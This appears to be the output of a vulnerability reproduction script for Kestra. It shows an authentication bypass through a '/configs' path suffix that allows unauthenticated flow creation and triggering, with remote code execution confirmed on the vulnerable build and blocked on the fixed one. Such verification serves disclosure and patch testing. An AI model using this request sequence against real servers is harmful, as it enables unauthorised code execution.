[vuln] GET /api/v1/main/flows/configs/configs/revisions (no creds, no /configs suffix) -> 401 (expect 401: auth enforced) [vuln] GET /api/v1/main/flows/configs/configs (no creds, /configs suffix) -> 404 (expect NOT 401: bypass) [vuln] POST /api/v1/main/flows/configs (no creds, create flow) -> 200 (expect 200) [vuln] POST /api/v1/main/executions/trigger/configs/configs?wait=true (no creds, trigger) -> 200 (expect 200) [vuln] RCE CONFIRMED: marker file written by attacker command: PWNED_KESTRA_RCE_1783230520_7605 [fixed] GET .../configs/configs/revisions (no creds) -> 401 (expect 401) [fixed] GET .../flows/configs/configs (no creds, /configs suffix) -> 401 (expect 401: bypass closed) [fixed] POST .../flows/configs (no creds, create flow) -> 401 (expect 401) [fixed] POST .../trigger/configs/configs (no creds, trigger) -> 401 (expect 401) [fixed] no marker file created (expected) ========================================== AUTH_BYPASS_ON_VULNERABLE = yes UNAUTH_RCE_ON_VULNERABLE = yes FIXED_BLOCKS_BYPASS = yes ==========================================